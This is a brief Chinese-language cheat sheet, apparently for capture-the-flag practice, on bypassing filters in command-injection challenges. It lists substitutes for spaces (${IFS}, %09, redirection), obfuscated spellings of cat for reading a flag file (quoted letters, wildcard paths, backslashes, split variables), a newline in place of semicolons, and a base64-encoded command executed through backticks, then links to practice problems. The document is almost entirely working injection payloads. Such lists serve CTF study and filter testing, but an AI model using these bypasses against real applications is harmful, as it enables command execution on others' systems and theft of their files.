命令执行绕过

过滤空格

<>
<
${IFS}
$IFS
%09   #Tab

过滤读文件的命令

cat
tac
uniq
c'a't fl'a'g
/???/?at  #相当于cat
t\a\c
a=ag;b=fl;c=t;d=ca;$d$c $b$a

过滤;

%0a  (换行符)

正则贪心

a=ag;b=fl;cat $b$a

base64绕过

`echo Y2F0IGluZGV4LnBocA== | base64 -d`
#反引号:将 反引号里的命令执行的结果 作为命令执行

6字符命令执行

最后一道题 题目八 分析代码获得flag
[post cid="232" /]

一道例题
[post cid="210" /]